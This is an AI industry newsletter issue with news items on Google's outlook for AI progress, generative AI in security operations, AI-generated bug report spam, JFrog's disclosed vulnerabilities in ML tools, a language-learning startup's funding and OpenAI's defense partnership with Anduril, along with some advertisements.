- "Towards AGI"
- Posts
- Google’s Sundar Pichai: Expect Slower AI Breakthroughs in the Coming Years
Google’s Sundar Pichai: Expect Slower AI Breakthroughs in the Coming Years
The competitive landscape of generative AI, now populated by major players like Google, OpenAI, and Meta, has somewhat stabilized.
A Thought Leadership platform to help the world navigate towards Artificial General Intelligence We are committed to navigate the path towards Artificial General Intelligence (AGI) by building a community of innovators, thinkers, and AI enthusiasts.
Welcome to Gen Matrix: Your Guide to GenAI Innovation and Adoption across Industries
Discover the trailblazers driving AI innovation with Gen Matrix.
Our platform showcases:
Organizations: Industry early adopters integrating Generative AI
Startups: GenAI innovators in hardware, infrastructure, and applications
Leaders: Influential figures shaping the GenAI ecosystem
Why Choose Gen Matrix?
Stay ahead with our comprehensive insights into the evolving Generative AI landscape. Coming Soon: Our inaugural Gen Matrix launches December 2024. Sign up now to access the report! Nominate a Trailblazer: Know an AI innovator? Nominate them for recognition in our upcoming matrix. Gen Matrix: Where AI innovation meets practicality.
TheGen.AI News
Google’s Sundar Pichai: Expect Slower AI Breakthroughs in the Coming Years
Generative AI likely won’t revolutionize your life further by 2025, at least not beyond its current impact, according to Sundar Pichai, CEO of Google. Speaking at the New York Times’ DealBook Summit, Pichai noted that while OpenAI’s launch of ChatGPT two years ago sparked global interest, the pace of transformative breakthroughs in the field may slow down.
“The easier advancements have already been achieved,” Pichai explained. “Moving forward, the challenges are more complex, requiring deeper innovations to reach the next level.”
The competitive landscape of generative AI, now populated by major players like Google, OpenAI, and Meta, has somewhat stabilized. Current models—such as ChatGPT, Google’s Gemini, and Meta’s Llama—will continue to improve incrementally, particularly in reasoning and executing sequences of actions. These enhancements could help businesses unlock AI’s profitability, though this milestone remains elusive despite investments in the technology, which Goldman Sachs projects will surpass $1 trillion in the coming years.
Pichai emphasized that a dramatic leap in AI’s capabilities, akin to its initial surge in popularity, is unlikely in the near future. Microsoft CEO Satya Nadella echoed this sentiment, comparing AI’s development trajectory to the Industrial Revolution, which experienced prolonged periods of gradual growth before surging ahead.
However, others in the industry, such as OpenAI CEO Sam Altman, have publicly disagreed. In November, Altman posted “there is no wall” on social media platform X, dismissing claims that the recently released ChatGPT-4 offered only modest improvements over its predecessors.
While the rate of breakthroughs may slow, even small advances will continue to make AI more useful for a broader audience, Pichai said. This could democratize access to skills like programming, potentially making it accessible to millions within the next decade. Meanwhile, roles in the AI sector remain lucrative: AI trainers earn an average of $64,000 annually, while prompt engineers average over $110,000, according to ZipRecruiter.
Cybersecurity’s Gen AI Revolution: Progress with a Side of Trepidation
Generative AI is rapidly being integrated into security tools, as Chief Information Security Officers (CISOs) leverage the technology to streamline manual processes and boost productivity. However, this surge in adoption is accompanied by caution among cybersecurity professionals, a factor CISOs must consider when implementing generative AI in security operations.
Early adopters are already using generative AI to enhance security workflows and improve incident response. Security vendors are also rolling out AI-powered tools to increase efficiency for security analysts, with applications in intrusion detection, anomaly detection, malware identification, and fraud prevention.
Peter Garraghan, CEO and CTO of AI security firm Mindgard, highlights the capabilities of generative AI in recognizing patterns from disparate data and automating repetitive tasks. He notes that AI-powered tools for log management are becoming standard among vendors, furthering adoption.
While AI in security isn’t new—natural language processing (NLP) and machine learning have been used for years—the arrival of generative AI has accelerated innovation, reshaping AI-powered security.
Promising Potential, Notable Risks
Research by IDC identifies several use cases for generative AI in cybersecurity, including alert correlation, rule generation, policy updates, and compliance. However, enterprises need to proceed carefully, as generative AI comes with risks such as data exposure, errors due to incomplete datasets, and challenges in integrating human oversight with automated analytics.
Generative AI excels in automating tasks like report writing and incident reporting, but human intuition and complementary technologies remain essential for tasks like threat prioritization, according to Christian Have, CTO of Logpoint.
Top Use Cases and Barriers
A survey by ISC2 reveals that generative AI is already being used for operational tasks like automating administrative processes, accelerating case management, and translating natural language into policy. It’s also simplifying threat intelligence, speeding up incident reporting, and refining threat actor profiles. Other use cases include threat hunting, policy simulations, and privacy risk assessments.
Despite its potential, concerns remain. More than half of survey respondents reported data privacy and security challenges due to generative AI, while nearly two-thirds believe the technology poses significant future threats. A lack of clear strategy and insufficient training were identified as major barriers to adoption.
Globally, training around generative AI varies significantly, with North America lagging behind regions like the Middle East, Latin America, and Asia-Pacific.
A Complement, Not a Replacement
Generative AI should be viewed as a tool to complement, not replace, security operations centers (SOCs), says Rahul Tyagi, CEO of SECQAI. While it’s effective for tasks like report generation and natural language interactions, it requires human oversight to avoid risks such as false negatives.
The technology also enhances security awareness by creating realistic phishing simulations tailored to specific roles. It can streamline incident response by automating playbook execution and improve compliance mapping across regulatory frameworks.
Emerging Frontiers: Agentic AI
Experts are now looking to agentic AI as the next evolution of cybersecurity. By autonomously managing threats in real-time, agentic AI builds on generative AI’s outputs to enhance threat detection and mitigation. Joe Partlow, CTO of ReliaQuest, emphasizes its potential to reduce time spent on routine tasks, allowing analysts to focus on strategic activities like threat hunting.
As generative AI continues to evolve, its applications in cybersecurity promise increased efficiency, but organizations must balance innovation with robust strategies to manage associated risks.
BofA says +80% of young, wealthy investors want this asset—now it can be yours.
A 2024 Bank of America survey revealed something incredible: 83% of HNW respondents 43 and younger say they currently own art, or would like to.
Why? After weathering multiple recessions, newer generations say they want to diversify beyond just stocks and bonds. Luckily, Masterworks’ art investing platform is already catering to 60,000+ investors of every generation, making it easy to diversify with an asset that’s overall outpaced the S&P 500 in price appreciation (1995-2023), even despite a recent dip.
To date, each of Masterworks’ 23 sales has individually returned a profit to investors, and with 3 illustrative sales, Masterworks investors have realized net annualized returns of +17.6%, +17.8%, and +21.5%
Past performance not indicative of future returns. Investing Involves Risk. See Important Disclosures at masterworks.com/cd.
TheOpensource.AI News
Open Source Developers Struggle with Flood of AI-Driven Bug Reports
The rise of AI-generated software vulnerability reports has introduced a “new era of sloppy security reports for open source projects,” frustrating developers who maintain these projects. Bug hunters relying on machine learning tools are exacerbating the problem, according to Seth Larson, security developer-in-residence at the Python Software Foundation.
In a recent blog post, Larson highlighted a surge in low-quality, spam-like, and AI-generated security reports, which require time to investigate despite being largely invalid. He pointed out similar complaints from the Curl project earlier this year, emphasizing that such reports should be treated as potentially malicious.
A recent example from the Curl project illustrates the issue. On December 8, project maintainer Daniel Stenberg responded to an AI-generated bug report, expressing his frustration. Stenberg criticized the “AI slop” reports for unnecessarily burdening maintainers, adding that these submissions often lead to prolonged discussions filled with low-value, AI-generated responses.
Generative AI models have amplified problems associated with low-quality online content, creating challenges in journalism, web searches, social media, and now open-source security. For open-source projects, these AI-assisted bug reports are especially problematic because they demand attention and evaluation from security engineers, many of whom are volunteers with limited time.
While Larson encounters relatively few AI-generated bug reports—fewer than ten per month—he views them as an early warning sign. “What’s happening to Python or pip could eventually affect more projects or occur more frequently,” he cautioned. Larson also expressed concern for maintainers handling such issues in isolation, warning that unrecognized AI-generated reports could waste valuable time and contribute to burnout.
To address this, Larson believes the open-source community needs proactive solutions, including increasing visibility and trust in contributors. He emphasized that funding and employer-donated time could help alleviate the burden on individual maintainers. However, Larson discouraged the use of AI for bug reporting, arguing that current AI systems lack the ability to understand code effectively.
Larson also urged platforms that accept vulnerability reports to implement measures limiting automated or abusive submissions. Until then, he advises bug reporters to ensure their findings are verified by humans before submission.
Open-Source AI Vulnerabilities Put ML Clients and ‘Safe’ Models at Risk
Researchers from JFrog have identified multiple vulnerabilities in open-source machine learning (ML) tools that could enable client-side malicious code execution or path traversal attacks, even when using ostensibly "safe" model formats. Detailed in a recent blog post, the flaws were found in MLflow, H2O, PyTorch, and MLeap and are part of a broader discovery of 22 vulnerabilities across 15 ML projects over the past few months.
Key Vulnerabilities in ML Tools
MLflow: Cross-Site Scripting and Arbitrary Code Execution
One of the vulnerabilities, tracked as CVE-2024-27132, affects MLflow, a platform for managing the ML lifecycle. It is an XSS vulnerability that occurs when MLflow Recipes fail to execute successfully, rendering error messages in HTML that include unsanitized variables like failure_traceback
. Attackers can exploit this by embedding malicious scripts into a recipe.yaml
file, leading to XSS attacks or arbitrary code execution in environments like JupyterLab.
In JupyterLab, the exploit can execute JavaScript within the application, bypassing sandboxing to run arbitrary Python code by injecting malicious payloads into MLflow Recipes.
H2O: Code Execution via Deserialization
Another flaw, CVE-2024-6960, was found in H2O, a distributed in-memory ML platform. The vulnerability stems from the misuse of ObjectInputStream
to deserialize objects from a byte array. By injecting malicious code into a model's hyperparameter map, attackers can trigger the code upon deserialization, resulting in client-side code execution.
PyTorch: Path Traversal Exploit
In PyTorch, researchers uncovered a path traversal vulnerability in its TorchScript feature. Even when using safeguards like the weights_only
argument in the torch.load
API to prevent code execution, attackers can exploit this flaw by overwriting arbitrary files on the system using the torch.save
API. This could allow for malicious code execution or denial of service by corrupting essential files. The issue underscores the risks of loading untrusted ML models.
MLeap: ZipSlip Path Traversal
The final vulnerability, CVE-2023-5245, is a "ZipSlip" path traversal flaw in the MLeap library. The issue arises from the FileUtil.extract
function, which does not validate file paths in a ZIP archive, allowing attackers to use traversal characters like ../
to escape the intended directory. This flaw can be exploited during inference on zipped TensorFlow models, enabling attackers to inject malicious files outside the designated directory.
Broader Implications and Risks
JFrog researchers warn that these vulnerabilities demonstrate the potential for lateral movement within ML ecosystems. Once an ML client is compromised, attackers could target connected services like model registries and MLOps pipelines to steal or backdoor ML models.
Moreover, the flaws highlight that even "safe" model formats may not be entirely secure and emphasize the importance of thoroughly validating open-source models before deployment. Safeguards such as the weights_only
argument in PyTorch are not foolproof, as attackers can exploit other system interactions to achieve malicious outcomes.
Recommendations
JFrog's findings stress the critical need for improved safety protocols in handling open-source ML models. Users and developers are advised to:
Avoid loading untrusted models without thorough validation.
Implement robust input sanitization and directory validation in tools like MLflow and MLeap.
Regularly update and patch ML libraries to mitigate known vulnerabilities.
Enhance awareness of the risks associated with open-source ML tools and invest in stronger safeguards for managing ML pipelines.
These vulnerabilities underscore the ongoing challenge of securing open-source ML projects, where even established tools can introduce risks that threaten the broader ecosystem.
TheClosedsource.AI News
AI-Powered Language Learning Startup Hits $1 Billion Valuation
Speak, a startup leveraging artificial intelligence to aid language learning, has reached a $1 billion valuation following a new funding round, doubling its value in just six months. The company announced on Tuesday that it secured $78 million in funding, led by venture capital firm Accel, with contributions from existing backers like the OpenAI Startup Fund, Khosla Ventures, and Y Combinator. Speak has now raised a total of $162 million.
Unlike competitors such as Rosetta Stone and Duolingo, which emphasize gamified learning experiences, Speak aims to improve users' fluency through AI-driven, conversational practice. Its app enables users to engage in verbal interactions with an AI system, providing real-time feedback through a speech recognition model that adapts to diverse accents.
“Traditionally, achieving fluency required a human tutor or teacher,” said Andrew Hsu, co-founder and Chief Technology Officer. “Until recently, the technology to create a conversational AI partner simply didn’t exist.”
Speak’s latest funding highlights its success in the consumer AI market, which has seen slower funding growth compared to enterprise AI. While enterprise AI startups have raised $16.4 billion this year, consumer AI companies have attracted less than half that amount, according to PitchBook.
“There are many consumer AI companies chasing potential, but few have turned that promise into meaningful revenue,” said Ben Quazzo, a partner at Accel who led the investment and is joining Speak’s board.
The startup operates on a subscription model, with premium plans starting at $20 per month. CEO Connor Zwick shared that Speak is nearing profitability, with revenues in the eight-figure range. Although its primary focus has been on individual users, Speak’s enterprise offering is gaining traction. Zwick noted that eight of Korea’s 10 largest employers have adopted Speak for Business to help employees learn English. With the new funding, Speak plans to expand its presence in Southeast Asia, Europe, and the United States while supporting additional languages by the end of next year.
OpenAI Partners With Anduril To Develop AI-Powered Anti-Drone Systems
OpenAI has entered its first significant defense partnership through a collaboration with Anduril Industries, a defense startup founded by Oculus VR co-founder Palmer Luckey. Anduril, which produces military technology such as sentry towers, communication jammers, drones, and autonomous submarines, announced the partnership will integrate OpenAI's models into its systems. The goal is to process time-sensitive data more efficiently, reduce the workload for human operators, and enhance situational awareness.
Anduril already supplies counter-drone technology to the U.S. government and has recently been tasked with developing and testing unmanned fighter jets under a $100 million contract with the Pentagon’s Chief Digital and AI Office.
OpenAI clarified to the Washington Post that this collaboration focuses on defending against unmanned aerial threats, such as drones, and does not extend to technologies directly associated with human casualties. Both OpenAI and Anduril emphasize that the partnership aims to help the U.S. maintain parity with China's advancements in AI, aligning with broader government investments in AI development for national security.
"OpenAI builds AI to benefit as many people as possible, and supports U.S.-led efforts to ensure the technology upholds democratic values," said OpenAI CEO Sam Altman. He noted that the partnership would aid in protecting U.S. military personnel and help the defense community responsibly utilize AI technologies.
This collaboration comes after OpenAI quietly revised its policy in January, removing explicit prohibitions on applications involving "military and warfare." However, OpenAI insists its tools cannot be used to harm individuals, develop weapons, or conduct surveillance. The updated policy allows national security use cases aligned with OpenAI’s mission, such as securing critical infrastructure through partnerships with agencies like DARPA.
OpenAI has reportedly been exploring opportunities with the U.S. military and national security offices over the past year, leveraging connections such as a former security officer at Palantir. The move mirrors similar initiatives by other AI companies. Anthropic, creators of Claude, recently partnered with Palantir and Amazon Web Services to provide AI tools to defense and intelligence agencies for classified operations.
There are also rumors suggesting Palantir CTO Shyam Sankar might be considered for a prominent role at the Pentagon. Sankar has previously criticized traditional government procurement processes, advocating for a shift toward leveraging commercial technologies instead of relying solely on major defense contractors.
There’s a reason 400,000 professionals read this daily.
Join The AI Report, trusted by 400,000+ professionals at Google, Microsoft, and OpenAI. Get daily insights, tools, and strategies to master practical AI skills that drive results.
Don’t miss out on the insights driving the future of Artificial Intelligence! Join a community of researchers, developers, and AI enthusiasts to stay ahead of the curve in Generative AI. Each edition delivers exclusive updates, expert analysis, and thought-provoking discussions straight to your inbox. Subscribe today and be part of the journey toward AGI innovation.
Contact us for any paid collaborations and sponsorships.
Unlock the future of problem solving with Generative AI!

If you're a professional looking to elevate your strategic insights, enhance decision-making, and redefine problem-solving with cutting-edge technologies, the Consulting in the age of Gen AI course is your gateway. Perfect for those ready to integrate Generative AI into your work and stay ahead of the curve.
In a world where AI is rapidly transforming industries, businesses need professionals and consultants who can navigate this evolving landscape. This learning experience arms you with the essential skills to leverage Generative AI for improving problem-solving, decision-making, or advising clients.
Join us and gain firsthand experience in how state-of-the-art technology can elevate your problem solving skills using GenAI to new heights. This isn’t just learning; it’s your competitive edge in an AI-driven world.